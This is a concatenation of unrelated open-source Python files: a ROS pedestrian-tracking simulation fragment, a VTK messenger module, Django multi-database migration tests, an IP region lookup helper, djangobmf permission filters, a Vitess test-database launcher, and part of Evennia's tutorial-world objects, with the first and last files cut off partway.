trackedPersons.tracks.append( createTrackedPerson( 33, 24.5281, 18.5868, 54 ) )
trackedPersons.tracks.append( createTrackedPerson( 34, 16.554, 3.40568-2, 94 ) )
trackedPersons.tracks.append( createTrackedPerson( 35, 16, 6-1, 94 ) )
trackedPersons.tracks.append( createTrackedPerson( 36, 20, 4, 0 ) )
trackedPersons.tracks.append( createTrackedPerson( 37, 19, 12, 25 ) )
trackedPersons.tracks.append( createTrackedPerson( 38, 23, 8, 50 ) )
trackedPersons.tracks.append( createTrackedPerson( 39, 24, 10, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 40, 25, 12, 120 ) )
trackedPersons.tracks.append( createTrackedPerson( 41, 7.51, 22.41, 80 ) )
trackedPersons.tracks.append( createTrackedPerson( 42, 8.21, 25.7, 81 ) )
trackedPersons.tracks.append( createTrackedPerson( 43, 3.31, 27.7, 81 ) )
trackedPersons.tracks.append( createTrackedPerson( 44, 11.421, 18.7, 75 ) )
trackedPersons.tracks.append( createTrackedPerson( 45, 25.21, 27.0, 85 ) )
trackedPersons.tracks.append( createTrackedPerson( 46, 18.23, 6.87, -91 ) )
trackedPersons.tracks.append( createTrackedPerson( 47, 18.6, 8.90, -90 ) )
trackedPersons.tracks.append( createTrackedPerson( 48, 20.4, 7.87, 85 ) )
trackedPersons.tracks.append( createTrackedPerson( 49, 15.684, 10.74, 75 ) )
trackedPersons.tracks.append( createTrackedPerson( 50, 15.72,14.51 , 70 ) )
trackPublisher.publish( trackedPersons )
#obstacles['header'] = trackedPersons.header
#obstaclesPublisher.publish( obstacles )
seqCounter += 1
rate.sleep()
OBSTACLE_YAML= """
header:
seq: 48860
stamp:
secs: 0
nsecs: 0
frame_id: world
cell_width: 1.0
cell_height: 1.0
cells:
-
x: -0.5
y: -0.5
z: 0.0
-
x: 0.5
y: -0.5
z: 0.0
-
x: 1.5
y: -0.5
z: 0.0
-
x: 2.5
y: -0.5
z: 0.0
-
x: 3.5
y: -0.5
z: 0.0
-
x: 4.5
y: -0.5
z: 0.0
-
x: 5.5
y: -0.5
z: 0.0
-
x: 6.5
y: -0.5
z: 0.0
-
x: 7.5
y: -0.5
z: 0.0
-
x: 8.5
y: -0.5
z: 0.0
-
x: 9.5
y: -0.5
z: 0.0
-
x: 10.5
y: -0.5
z: 0.0
-
x: 11.5
y: -0.5
z: 0.0
-
x: 12.5
y: -0.5
z: 0.0
-
x: 13.5
y: -0.5
z: 0.0
-
x: 14.5
y: -0.5
z: 0.0
-
x: 15.5
y: -0.5
z: 0.0
-
x: 16.5
y: -0.5
z: 0.0
-
x: 17.5
y: -0.5
z: 0.0
-
x: 18.5
y: -0.5
z: 0.0
-
x: 19.5
y: -0.5
z: 0.0
-
x: 20.5
y: -0.5
z: 0.0
-
x: 21.5
y: -0.5
z: 0.0
-
x: 22.5
y: -0.5
z: 0.0
-
x: 23.5
y: -0.5
z: 0.0
-
x: 24.5
y: -0.5
z: 0.0
-
x: 25.5
y: -0.5
z: 0.0
-
x: 26.5
y: -0.5
z: 0.0
-
x: 27.5
y: -0.5
z: 0.0
-
x: -0.5
y: -0.5
z: 0.0
-
x: -0.5
y: 0.5
z: 0.0
-
x: -0.5
y: 1.5
z: 0.0
-
x: -0.5
y: 2.5
z: 0.0
-
x: -0.5
y: 3.5
z: 0.0
-
x: -0.5
y: 4.5
z: 0.0
-
x: -0.5
y: 5.5
z: 0.0
-
x: -0.5
y: 6.5
z: 0.0
-
x: -0.5
y: 7.5
z: 0.0
-
x: -0.5
y: 8.5
z: 0.0
-
x: -0.5
y: 9.5
z: 0.0
-
x: -0.5
y: 10.5
z: 0.0
-
x: -0.5
y: 11.5
z: 0.0
-
x: -0.5
y: 12.5
z: 0.0
-
x: -0.5
y: 13.5
z: 0.0
-
x: -0.5
y: 14.5
z: 0.0
-
x: -0.5
y: 15.5
z: 0.0
-
x: -0.5
y: 16.5
z: 0.0
-
x: -0.5
y: 17.5
z: 0.0
-
x: -0.5
y: 18.5
z: 0.0
-
x: -0.5
y: 19.5
z: 0.0
-
x: -0.5
y: 20.5
z: 0.0
-
x: -0.5
y: 21.5
z: 0.0
-
x: -0.5
y: 22.5
z: 0.0
-
x: -0.5
y: 23.5
z: 0.0
-
x: -0.5
y: 24.5
z: 0.0
-
x: -0.5
y: 25.5
z: 0.0
-
x: -0.5
y: 26.5
z: 0.0
-
x: -0.5
y: 27.5
z: 0.0
-
x: -0.5
y: 28.5
z: 0.0
-
x: -0.5
y: 29.5
z: 0.0
-
x: -0.5
y: 30.5
z: 0.0
-
x: -0.5
y: 31.5
z: 0.0
-
x: -0.5
y: 31.5
z: 0.0
-
x: 0.5
y: 31.5
z: 0.0
-
x: 1.5
y: 31.5
z: 0.0
-
x: 2.5
y: 31.5
z: 0.0
-
x: 3.5
y: 31.5
z: 0.0
-
x: 4.5
y: 31.5
z: 0.0
-
x: 5.5
y: 31.5
z: 0.0
-
x: 6.5
y: 31.5
z: 0.0
-
x: 7.5
y: 31.5
z: 0.0
-
x: 8.5
y: 31.5
z: 0.0
-
x: 9.5
y: 31.5
z: 0.0
-
x: 10.5
y: 31.5
z: 0.0
-
x: 11.5
y: 31.5
z: 0.0
-
x: 12.5
y: 31.5
z: 0.0
-
x: 13.5
y: 31.5
z: 0.0
-
x: 14.5
y: 31.5
z: 0.0
-
x: 15.5
y: 31.5
z: 0.0
-
x: 16.5
y: 31.5
z: 0.0
-
x: 17.5
y: 31.5
z: 0.0
-
x: 18.5
y: 31.5
z: 0.0
-
x: 19.5
y: 31.5
z: 0.0
-
x: 20.5
y: 31.5
z: 0.0
-
x: 21.5
y: 31.5
z: 0.0
-
x: 22.5
y: 31.5
z: 0.0
-
x: 23.5
y: 31.5
z: 0.0
-
x: 24.5
y: 31.5
z: 0.0
-
x: 25.5
y: 31.5
z: 0.0
-
x: 26.5
y: 31.5
z: 0.0
-
x: 27.5
y: 31.5
z: 0.0
-
x: 27.5
y: -0.5
z: 0.0
-
x: 27.5
y: 0.5
z: 0.0
-
x: 27.5
y: 1.5
z: 0.0
-
x: 27.5
y: 2.5
z: 0.0
-
x: 27.5
y: 3.5
z: 0.0
-
x: 27.5
y: 4.5
z: 0.0
-
x: 27.5
y: 5.5
z: 0.0
-
x: 27.5
y: 6.5
z: 0.0
-
x: 27.5
y: 7.5
z: 0.0
-
x: 27.5
y: 8.5
z: 0.0
-
x: 27.5
y: 9.5
z: 0.0
-
x: 27.5
y: 10.5
z: 0.0
-
x: 27.5
y: 11.5
z: 0.0
-
x: 27.5
y: 12.5
z: 0.0
-
x: 27.5
y: 13.5
z: 0.0
-
x: 27.5
y: 14.5
z: 0.0
-
x: 27.5
y: 15.5
z: 0.0
-
x: 27.5
y: 16.5
z: 0.0
-
x: 27.5
y: 17.5
z: 0.0
-
x: 27.5
y: 18.5
z: 0.0
-
x: 27.5
y: 19.5
z: 0.0
-
x: 27.5
y: 20.5
z: 0.0
-
x: 27.5
y: 21.5
z: 0.0
-
x: 27.5
y: 22.5
z: 0.0
-
x: 27.5
y: 23.5
z: 0.0
-
x: 27.5
y: 24.5
z: 0.0
-
x: 27.5
y: 25.5
z: 0.0
-
x: 27.5
y: 26.5
z: 0.0
-
x: 27.5
y: 27.5
z: 0.0
-
x: 27.5
y: 28.5
z: 0.0
-
x: 27.5
y: 29.5
z: 0.0
-
x: 27.5
y: 30.5
z: 0.0
-
x: 27.5
y: 31.5
z: 0.0
-
x: 26.5
y: 3.5
z: 0.0
-
x: 26.5
y: 4.5
z: 0.0
-
x: 26.5
y: 5.5
z: 0.0
-
x: 26.5
y: 6.5
z: 0.0
-
x: 26.5
y: 7.5
z: 0.0
-
x: 26.5
y: 9.5
z: 0.0
-
x: 26.5
y: 10.5
z: 0.0
-
x: 26.5
y: 11.5
z: 0.0
-
x: 26.5
y: 12.5
z: 0.0
-
x: 26.5
y: 13.5
z: 0.0
"""
if __name__ == '__main__':
main()
|
"""
Implements a simple, robust, safe, Messenger class that allows one to
register callbacks for a signal/slot (or event/handler) kind of
messaging system. One can basically register a callback
function/method to be called when an object sends a particular event.
The Messenger class is Borg. So it is easy to instantiate and use.
This module is also reload-safe, so if the module is reloaded the
callback information is not lost. Method callbacks do not have a
reference counting problem since weak references are used.
The main functionality of this module is provided by three functions,
`connect`, `disconnect` and `send`.
Here is example usage with VTK::
>>> import messenger, vtk
>>> def cb(obj, evt):
... print obj.__class__.__name__, evt
...
>>> o = vtk.vtkProperty()
>>> o.AddObserver('ModifiedEvent', messenger.send)
1
>>> messenger.connect(o, 'ModifiedEvent', cb)
>>>
>>> o.SetRepresentation(1)
vtkOpenGLProperty ModifiedEvent
>>> messenger.connect(o, 'AnyEvent', cb)
>>> o.SetRepresentation(2)
vtkOpenGLProperty ModifiedEvent
vtkOpenGLProperty ModifiedEvent
>>>
>>> messenger.send(o, 'foo')
vtkOpenGLProperty foo
>>> messenger.disconnect(o, 'AnyEvent')
>>> messenger.send(o, 'foo')
>>>
This approach is necessary if you don't want to be bitten by reference
cycles. If you have a Python object holding a reference to a VTK
object and pass a method of the object to the AddObserver call, you
will get a reference cycle that cannot be collected by the garbage
collector. Using this messenger module gets around the problem.
Also note that adding a connection for 'AnyEvent' will trigger a
callback no matter what event was generated. The code above also
shows how disconnection works.
"""
__all__ = ['Messenger', 'MessengerError',
'connect', 'disconnect', 'send']
import types
import sys
import weakref
_saved = {}
for name in ['messenger', 'tvtk.messenger']:
if sys.modules.has_key(name):
mod = sys.modules[name]
if hasattr(mod, 'Messenger'):
_saved = mod.Messenger._shared_data
del mod
break
class MessengerError(Exception):
pass
class Messenger:
"""Implements a messenger class which deals with something like
signals and slots. Basically, an object can register a signal
that it plans to emit. Any other object can decide to handle that
signal (of that particular object) by registering itself with the
messenger. When a signal is emitted the messenger calls all
handlers. This makes it totally easy to deal with communication
between objects. The class is Borg. Rather than use this class,
please use the 'connect' and 'disconnect' functions.
"""
_shared_data = _saved
def __init__(self):
"""Create the messenger. This class is Borg. So all
instances are the same.
"""
self.__dict__ = self._shared_data
if not hasattr(self, '_signals'):
# First instantiation.
self._signals = {}
self._catch_all = ['AnyEvent', 'all']
#################################################################
# 'Messenger' interface.
#################################################################
def connect(self, obj, event, callback):
""" Registers a slot given an object and its signal to slot
into and also given a bound method in `callback` that should
have two arguments. `send` will call the callback
with the object that emitted the signal and the actual
event/signal as arguments.
Parameters
----------
- obj : Python object
Any Python object that will generate the particular event.
- event : An event (can be anything, usually strings)
The event `obj` will generate. If this is in the list
`self._catch_all`, then any event will call this callback.
- callback : `function` or `method`
This callback will be called when the object generates the
particular event. The object, event and any other arguments
and keyword arguments given by the `obj` are passed along to
the callback.
"""
typ = type(callback)
key = hash(obj)
if not self._signals.has_key(key):
self._signals[key] = {}
signals = self._signals[key]
if not signals.has_key(event):
signals[event] = {}
slots = signals[event]
callback_key = hash(callback)
if typ is types.FunctionType:
slots[callback_key] = (None, callback)
elif typ is types.MethodType:
obj = weakref.ref(callback.im_self)
name = callback.__name__
slots[callback_key] = (obj, name)
else:
raise MessengerError, \
"Callback must be a function or method. "\
"You passed a %s."%(str(callback))
def disconnect(self, obj, event=None, callback=None, obj_is_hash=False):
"""Disconnects the object and its event handlers.
Parameters
----------
- obj : Object
The object that generates events.
- event : The event. (defaults to None)
- callback : `function` or `method`
The event handler.
If `event` and `callback` are None (the default) all the
events and handlers for the object are removed. If only
`callback` is None, only this handler is removed. If `obj`
and 'event' alone are specified, all handlers for the event
are removed.
- obj_is_hash : `bool`
Specifies if the object passed is a hash instead of the object itself.
This is needed if the object is gc'd but only the hash exists and one
wants to disconnect the object.
"""
signals = self._signals
if obj_is_hash:
key = obj
else:
key = hash(obj)
if not signals.has_key(key):
return
if callback is None:
if event is None:
del signals[key]
else:
del signals[key][event]
else:
del signals[key][event][hash(callback)]
def send(self, source, event, *args, **kw_args):
"""To be called by the object `source` that desires to
generate a particular event. This function in turn invokes
all the handlers for the event passing the `source` object,
event and any additional arguments and keyword arguments. If
any connected callback is garbage collected without being
disconnected, it is silently removed from the existing slots.
Parameters
----------
- source : Python object
This is the object that generated the event.
- event : The event.
If there are handlers connected to events called 'AnyEvent'
or 'all', then any event will invoke these.
"""
try:
sigs = self._get_signals(source)
except (MessengerError, KeyError):
return
events = self._catch_all[:]
if event not in events:
events.append(event)
for evt in events:
if sigs.has_key(evt):
slots = sigs[evt]
for key in slots.keys():
obj, meth = slots[key]
if obj: # instance method
inst = obj()
if inst:
getattr(inst, meth)(source, event, *args, **kw_args)
else:
# Oops, dead reference.
del slots[key]
else: # normal function
meth(source, event, *args, **kw_args)
def is_registered(self, obj):
"""Returns if the given object has registered itself with the
messenger.
"""
try:
sigs = self._get_signals(obj)
except MessengerError:
return 0
else:
return 1
def get_signal_names(self, obj):
"""Returns a list of signal names the object passed has
registered.
"""
return self._get_signals(obj).keys()
#################################################################
# Non-public interface.
#################################################################
def _get_signals(self, obj):
"""Given an object `obj` it returns the signals of that
object.
"""
ret = self._signals.get(hash(obj))
if ret is None:
raise MessengerError, \
"No such object: %s, has registered itself "\
"with the messenger."%obj
else:
return ret
_messenger = Messenger()
def connect(obj, event, callback):
_messenger.connect(obj, event, callback)
connect.__doc__ = _messenger.connect.__doc__
def disconnect(obj, event=None, callback=None, obj_is_hash=False):
_messenger.disconnect(obj, event, callback)
disconnect.__doc__ = _messenger.disconnect.__doc__
def send(obj, event, *args, **kw_args):
_messenger.send(obj, event, *args, **kw_args)
send.__doc__ = _messenger.send.__doc__
del _saved
|
import unittest
from django.db import connection, migrations, models
from django.db.migrations.state import ProjectState
from django.test import override_settings
from .test_operations import OperationTestBase
try:
import sqlparse
except ImportError:
sqlparse = None
class AgnosticRouter(object):
"""
A router that doesn't have an opinion regarding migrating.
"""
def allow_migrate(self, db, model, **hints):
return None
class MigrateNothingRouter(object):
"""
A router that doesn't allow migrating.
"""
def allow_migrate(self, db, model, **hints):
return False
class MigrateEverythingRouter(object):
"""
A router that always allows migrating.
"""
def allow_migrate(self, db, model, **hints):
return True
class MigrateWhenFooRouter(object):
"""
A router that allows migrating depending on a hint.
"""
def allow_migrate(self, db, model, **hints):
return hints.get('foo', False)
class MultiDBOperationTests(OperationTestBase):
multi_db = True
def _test_create_model(self, app_label, should_run):
"""
Tests that CreateModel honours multi-db settings.
"""
operation = migrations.CreateModel(
"Pony",
[("id", models.AutoField(primary_key=True))],
)
# Test the state alteration
project_state = ProjectState()
new_state = project_state.clone()
operation.state_forwards(app_label, new_state)
# Test the database alteration
self.assertTableNotExists("%s_pony" % app_label)
with connection.schema_editor() as editor:
operation.database_forwards(app_label, editor, project_state, new_state)
if should_run:
self.assertTableExists("%s_pony" % app_label)
else:
self.assertTableNotExists("%s_pony" % app_label)
# And test reversal
with connection.schema_editor() as editor:
operation.database_backwards(app_label, editor, new_state, project_state)
self.assertTableNotExists("%s_pony" % app_label)
@override_settings(DATABASE_ROUTERS=[AgnosticRouter()])
def test_create_model(self):
"""
Test when router doesn't have an opinion (i.e. CreateModel should run).
"""
self._test_create_model("test_mltdb_crmo", should_run=True)
@override_settings(DATABASE_ROUTERS=[MigrateNothingRouter()])
def test_create_model2(self):
"""
Test when router returns False (i.e. CreateModel shouldn't run).
"""
self._test_create_model("test_mltdb_crmo2", should_run=False)
@override_settings(DATABASE_ROUTERS=[MigrateEverythingRouter()])
def test_create_model3(self):
"""
Test when router returns True (i.e. CreateModel should run).
"""
self._test_create_model("test_mltdb_crmo3", should_run=True)
def test_create_model4(self):
"""
Test multiple routers.
"""
with override_settings(DATABASE_ROUTERS=[AgnosticRouter(), AgnosticRouter()]):
self._test_create_model("test_mltdb_crmo4", should_run=True)
with override_settings(DATABASE_ROUTERS=[MigrateNothingRouter(), MigrateEverythingRouter()]):
self._test_create_model("test_mltdb_crmo4", should_run=False)
with override_settings(DATABASE_ROUTERS=[MigrateEverythingRouter(), MigrateNothingRouter()]):
self._test_create_model("test_mltdb_crmo4", should_run=True)
def _test_run_sql(self, app_label, should_run, hints=None):
with override_settings(DATABASE_ROUTERS=[MigrateEverythingRouter()]):
project_state = self.set_up_test_model(app_label)
sql = """
INSERT INTO {0}_pony (pink, weight) VALUES (1, 3.55);
INSERT INTO {0}_pony (pink, weight) VALUES (3, 5.0);
""".format(app_label)
operation = migrations.RunSQL(sql, hints=hints or {})
# Test the state alteration does nothing
new_state = project_state.clone()
operation.state_forwards(app_label, new_state)
self.assertEqual(new_state, project_state)
# Test the database alteration
self.assertEqual(project_state.apps.get_model(app_label, "Pony").objects.count(), 0)
with connection.schema_editor() as editor:
operation.database_forwards(app_label, editor, project_state, new_state)
Pony = project_state.apps.get_model(app_label, "Pony")
if should_run:
self.assertEqual(Pony.objects.count(), 2)
else:
self.assertEqual(Pony.objects.count(), 0)
@unittest.skipIf(sqlparse is None and connection.features.requires_sqlparse_for_splitting, "Missing sqlparse")
@override_settings(DATABASE_ROUTERS=[MigrateNothingRouter()])
def test_run_sql(self):
self._test_run_sql("test_mltdb_runsql", should_run=False)
@unittest.skipIf(sqlparse is None and connection.features.requires_sqlparse_for_splitting, "Missing sqlparse")
@override_settings(DATABASE_ROUTERS=[MigrateWhenFooRouter()])
def test_run_sql2(self):
self._test_run_sql("test_mltdb_runsql2", should_run=False)
self._test_run_sql("test_mltdb_runsql2", should_run=True, hints={'foo': True})
def _test_run_python(self, app_label, should_run, hints=None):
with override_settings(DATABASE_ROUTERS=[MigrateEverythingRouter()]):
project_state = self.set_up_test_model(app_label)
# Create the operation
def inner_method(models, schema_editor):
Pony = models.get_model(app_label, "Pony")
Pony.objects.create(pink=1, weight=3.55)
Pony.objects.create(weight=5)
operation = migrations.RunPython(inner_method, hints=hints or {})
# Test the state alteration does nothing
new_state = project_state.clone()
operation.state_forwards(app_label, new_state)
self.assertEqual(new_state, project_state)
# Test the database alteration
self.assertEqual(project_state.apps.get_model(app_label, "Pony").objects.count(), 0)
with connection.schema_editor() as editor:
operation.database_forwards(app_label, editor, project_state, new_state)
Pony = project_state.apps.get_model(app_label, "Pony")
if should_run:
self.assertEqual(Pony.objects.count(), 2)
else:
self.assertEqual(Pony.objects.count(), 0)
@override_settings(DATABASE_ROUTERS=[MigrateNothingRouter()])
def test_run_python(self):
self._test_run_python("test_mltdb_runpython", should_run=False)
@override_settings(DATABASE_ROUTERS=[MigrateWhenFooRouter()])
def test_run_python2(self):
self._test_run_python("test_mltdb_runpython2", should_run=False)
self._test_run_python("test_mltdb_runpython2", should_run=True, hints={'foo': True})
|
import ipaddress
__all__ = [
'config_to_map',
'get_region'
]
def config_to_map(topology_config):
"""
args:
topology_config: dict
{
'region1': [
'10.1.1.0/24',
'10.1.10.0/24',
'172.16.1.0/24'
],
'region2': [
'192.168.1.0/24',
'10.2.0.0/16',
]
}
Region cannot be "_default"
returns:
topology_map: dict
{
ip_network('10.1.1.0/24'): 'region1',
ip_network('10.1.10.0/24'): 'region1',
ip_network('172.16.1.0/24'): 'region1',
ip_network('192.168.1.0/24'): 'region2',
ip_network('10.2.0.0/16'): 'region2',
}
raises:
ValueError: if a region value is "_default"
"""
topology_map = {}
for region in topology_config:
# "_default" cannot be used as a region name
if region == '_default':
raise ValueError('cannot use "_default" as a region name')
for net_str in topology_config[region]:
net = ipaddress.ip_network(net_str)
topology_map[net] = region
return topology_map
def get_region(ip_str, topology_map):
"""Return name of a region from the topology map for
the given IP address, if multiple networks contain the IP,
region of the most specific(longest prefix length) match is returned,
if multiple equal prefix length found the behavior of which
entry is returned is undefined.
args:
ip_str: string representing an IP address
returns:
string: region name
None: if no region has been found
raises:
ValueError: raised by ipaddress if ip_str isn't a valid IP address
"""
ip = ipaddress.ip_address(ip_str)
# find all the matching networks
matches = []
for net in topology_map:
if ip in net:
matches.append(net)
# if only a single match is found return it
if len(matches) == 1:
return topology_map[matches[0]]
# if more than 1 match is found, sort the matches
# by prefixlen, return the longest prefixlen entry
elif len(matches) > 1:
matches.sort(key=lambda net: net.prefixlen)
return topology_map[matches[-1]]
# no matches found
return None
|
from __future__ import unicode_literals
from django.db.models import Q
from djangobmf.utils import FilterQueryset
class GoalFilter(FilterQueryset):
def filter_queryset(self, qs, user):
if user.has_perm('%s.can_manage' % qs.model._meta.app_label, qs.model):
return qs
qs_filter = Q(referee=user.djangobmf.employee or -1)
qs_filter |= Q(employees=user.djangobmf.employee or -1)
qs_filter |= Q(team__in=user.djangobmf.team)
if hasattr(qs.model, "project"): # pragma: no branch
project = qs.model._meta.get_field_by_name("project")[0].model
if user.has_perm('%s.can_manage' % project._meta.app_label, project):
qs_filter |= Q(project__isnull=False)
else:
qs_filter |= Q(project__isnull=False, project__employees=user.djangobmf.employee or -1)
qs_filter |= Q(project__isnull=False, project__team__in=user.djangobmf.team)
return qs.filter(qs_filter)
class TaskFilter(FilterQueryset):
def filter_queryset(self, qs, user):
qs_filter = Q(project__isnull=True, goal__isnull=True)
qs_filter |= Q(employee=user.djangobmf.employee or -1)
qs_filter |= Q(in_charge=user.djangobmf.employee)
if hasattr(qs.model, "goal"): # pragma: no branch
goal = qs.model._meta.get_field_by_name("goal")[0].model
if user.has_perm('%s.can_manage' % goal._meta.app_label, goal):
qs_filter |= Q(goal__isnull=False)
else:
qs_filter |= Q(goal__isnull=False, goal__referee=user.djangobmf.employee or -1)
qs_filter |= Q(goal__isnull=False, goal__employees=user.djangobmf.employee or -1)
qs_filter |= Q(goal__isnull=False, goal__team__in=user.djangobmf.team)
if hasattr(qs.model, "project"): # pragma: no branch
project = qs.model._meta.get_field_by_name("project")[0].model
if user.has_perm('%s.can_manage' % project._meta.app_label, project):
qs_filter |= Q(project__isnull=False)
else:
qs_filter |= Q(project__isnull=False, project__employees=user.djangobmf.employee or -1)
qs_filter |= Q(project__isnull=False, project__team__in=user.djangobmf.team)
return qs.filter(qs_filter)
|
"""Command-line tool for starting a local Vitess database for testing.
USAGE:
$ run_local_database --port 12345 \
--topology test_keyspace/-80:test_keyspace_0,test_keyspace/80-:test_keyspace_1 \
--schema_dir /path/to/schema/dir
It will run the tool, logging to stderr. On stdout, a small json structure
can be waited on and then parsed by the caller to figure out how to reach
the vtgate process.
Once done with the test, send an empty line to this process for it to clean-up,
and then just wait for it to exit.
"""
import json
import logging
import optparse
import os
import re
import sys
from vttest import environment
from vttest import local_database
from vttest import mysql_flavor
from vttest import vt_processes
shard_exp = re.compile(r'(.+)/(.+):(.+)')
def main(port, topology, schema_dir, vschema, mysql_only):
shards = []
for shard in topology.split(','):
m = shard_exp.match(shard)
if m:
shards.append(
vt_processes.ShardInfo(m.group(1), m.group(2), m.group(3)))
else:
sys.stderr.write('invalid --shard flag format: %s\n' % shard)
sys.exit(1)
environment.base_port = port
with local_database.LocalDatabase(shards, schema_dir, vschema, mysql_only) as local_db:
print json.dumps(local_db.config())
sys.stdout.flush()
try:
raw_input()
except EOFError:
sys.stderr.write(
'WARNING: %s: No empty line was received on stdin.'
' Instead, stdin was closed and the cluster will be shut down now.'
' Make sure to send the empty line instead to proactively shutdown'
' the local cluster. For example, did you forget the shutdown in'
' your test\'s tearDown()?\n' % os.path.basename(__file__))
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option(
'-p', '--port', type='int',
help='Port to use for vtcombo. If this is 0, a random port '
'will be chosen.')
parser.add_option(
'-t', '--topology',
help='Define which shards exist in the test topology in the'
' form <keyspace>/<shardrange>:<dbname>,... The dbname'
' must be unique among all shards, since they share'
' a MySQL instance in the test environment.')
parser.add_option(
'-s', '--schema_dir',
help='Directory for initial schema files. Within this dir,'
' there should be a subdir for each keyspace. Within'
' each keyspace dir, each file is executed as SQL'
' after the database is created on each shard.'
' If the directory contains a vschema.json file, it'
' will be used as the vschema for the V3 API.')
parser.add_option(
'-e', '--vschema',
help='If this file is specified, it will be used'
' as the vschema for the V3 API.')
parser.add_option(
'-m', '--mysql_only', action='store_true',
help='If this flag is set only mysql is initialized.'
' The rest of the vitess components are not started.'
' Also, the output specifies the mysql unix socket'
' instead of the vtgate port.')
parser.add_option(
'-v', '--verbose', action='store_true',
help='Display extra error messages.')
(options, args) = parser.parse_args()
if options.verbose:
logging.getLogger().setLevel(logging.DEBUG)
# This will set the flavor based on the MYSQL_FLAVOR env var,
# or default to MariaDB.
mysql_flavor.set_mysql_flavor(None)
main(options.port, options.topology, options.schema_dir, options.vschema, options.mysql_only)
|
"""
TutorialWorld - basic objects - Griatch 2011
This module holds all "dead" object definitions for
the tutorial world. Object-commands and -cmdsets
are also defined here, together with the object.
Objects:
TutorialObject
Readable
Climbable
Obelisk
LightSource
CrumblingWall
Weapon
WeaponRack
"""
from future.utils import listvalues
import random
from evennia import DefaultObject, DefaultExit, Command, CmdSet
from evennia import utils
from evennia.utils import search
from evennia.utils.spawner import spawn
class TutorialObject(DefaultObject):
"""
This is the baseclass for all objects in the tutorial.
"""
def at_object_creation(self):
"Called when the object is first created."
super(TutorialObject, self).at_object_creation()
self.db.tutorial_info = "No tutorial info is available for this object."
def reset(self):
"Resets the object, whatever that may mean."
self.location = self.home
class CmdRead(Command):
"""
Usage:
read [obj]
Read some text of a readable object.
"""
key = "read"
locks = "cmd:all()"
help_category = "TutorialWorld"
def func(self):
"""
Implements the read command. This simply looks for an
Attribute "readable_text" on the object and displays that.
"""
if self.args:
obj = self.caller.search(self.args.strip())
else:
obj = self.obj
if not obj:
return
# we want an attribute read_text to be defined.
readtext = obj.db.readable_text
if readtext:
string = "You read {C%s{n:\n %s" % (obj.key, readtext)
else:
string = "There is nothing to read on %s." % obj.key
self.caller.msg(string)
class CmdSetReadable(CmdSet):
"""
A CmdSet for readables.
"""
def at_cmdset_creation(self):
"""
Called when the cmdset is created.
"""
self.add(CmdRead())
class Readable(TutorialObject):
"""
This simple object defines some attributes and
"""
def at_object_creation(self):
"""
Called when object is created. We make sure to set the needed
Attribute and add the readable cmdset.
"""
super(Readable, self).at_object_creation()
self.db.tutorial_info = "This is an object with a 'read' command defined in a command set on itself."
self.db.readable_text = "There is no text written on %s." % self.key
# define a command on the object.
self.cmdset.add_default(CmdSetReadable, permanent=True)
class CmdClimb(Command):
"""
Climb an object
Usage:
climb <object>
This allows you to climb.
"""
key = "climb"
locks = "cmd:all()"
help_category = "TutorialWorld"
def func(self):
"Implements function"
if not self.args:
self.caller.msg("What do you want to climb?")
return
obj = self.caller.search(self.args.strip())
if not obj:
return
if obj != self.obj:
self.caller.msg("Try as you might, you cannot climb that.")
return
ostring = self.obj.db.climb_text
if not ostring:
ostring = "You climb %s. Having looked around, you climb down again." % self.obj.name
self.caller.msg(ostring)
# set a tag on the caller to remember that we climbed.
self.caller.tags.add("tutorial_climbed_tree", category="tutorial_world")
class CmdSetClimbable(CmdSet):
"Climbing cmdset"
def at_cmdset_creation(self):
"populate set"
self.add(CmdClimb())
class Climbable(TutorialObject):
"""
A climbable object. All that is special about it is that it has
the "climb" command available on it.
"""
def at_object_creation(self):
"Called at initial creation only"
self.cmdset.add_default(CmdSetClimbable, permanent=True)
class Obelisk(TutorialObject):
"""
This object changes its description randomly, and which is shown
determines which order "clue id" is stored on the Character for
future puzzles.
Important Attribute:
puzzle_descs (list): list of descriptions. One of these is
picked randomly when this object is looked at and its index
in the list is used as a key for to solve the puzzle.
"""
def at_object_creation(self):
"Called when object is created."
super(Obelisk, self).at_object_creation()
self.db.tutorial_info = "This object changes its desc randomly, and makes sure to remember which one you saw."
self.db.puzzle_descs = ["You see a normal stone slab"]
# make sure this can never be picked up
self.locks.add("get:false()")
def return_appearance(self, caller):
"""
This hook is called by the look command to get the description
of the object. We overload it with our own version.
"""
# randomly get the index for one of the descriptions
descs = self.db.puzzle_descs
clueindex = random.randint(0, len(descs) - 1)
# set this description, with the random extra
string = "The surface of the obelisk seem to waver, shift and writhe under your gaze, with " \
"different scenes and structures appearing whenever you look at it. "
self.db.desc = string + descs[clueindex]
# remember that this was the clue we got. The Puzzle room will
# look for this later to determine if you should be teleported
# or not.
caller.db.puzzle_clue = clueindex
# call the parent function as normal (this will use
# the new desc Attribute we just set)
return super(Obelisk, self).return_appearance(caller)
class CmdLight(Command):
"""
Creates light where there was none. Something to burn.
"""
key = "on"
aliases = ["light", "burn"]
# only allow this command if command.obj is carried by caller.
locks = "cmd:holds()"
help_category = "TutorialWorld"
def func(self):
"""
Implements the light command. Since this command is designed
to sit on a "lightable" object, we operate only on self.obj.
"""
if self.obj.light():
self.caller.msg("You light %s." % self.obj.key)
self.caller.location.msg_contents("%s lights %s!" % (self.caller, self.obj.key), exclude=[self.caller])
else:
self.caller.msg("%s is already burning." % self.obj.key)
class CmdSetLight(CmdSet):
"CmdSet for the lightsource commands"
key = "lightsource_cmdset"
# this is higher than the dark cmdset - important!
priority = 3
def at_cmdset_creation(self):
"called at cmdset creation"
self.add(CmdLight())
class LightSource(TutorialObject):
"""
This implements a light source object.
When burned out, the object will be deleted.
"""
def at_init(self):
"""
If this is called with the Attribute is_giving_light already
set, we know that the timer got killed by a server
reload/reboot before it had time to finish. So we kill it here
instead. This is the price we pay for the simplicity of the
non-persistent delay() method.
"""
if self.db.is_giving_light:
self.delete()
def at_object_creation(self):
"Called when object is first created."
super(LightSource, self).at_object_creation()
self.db.tutorial_info = "This object can be lit to create light. It has a timeout for how long it burns."
self.db.is_giving_light = False
self.db.burntime = 60 * 3 # 3 minutes
# this is the default desc, it can of course be customized
# when created.
self.db.desc = "A splinter of wood with remnants of resin on it, enough for burning."
# add the Light command
self.cmdset.add_default(CmdSetLight, permanent=True)
def _burnout(self):
"""
This is called when this light source burns out. We make no
use of the return value.
"""
# delete ourselves from the database
self.db.is_giving_light = False
try:
self.location.location.msg_contents("%s's %s flickers and dies." %
(self.location, self.key), exclude=self.location)
self.location.msg("Your %s flickers and dies." % self.key)
self.location.location.check_light_state()
except AttributeError:
try:
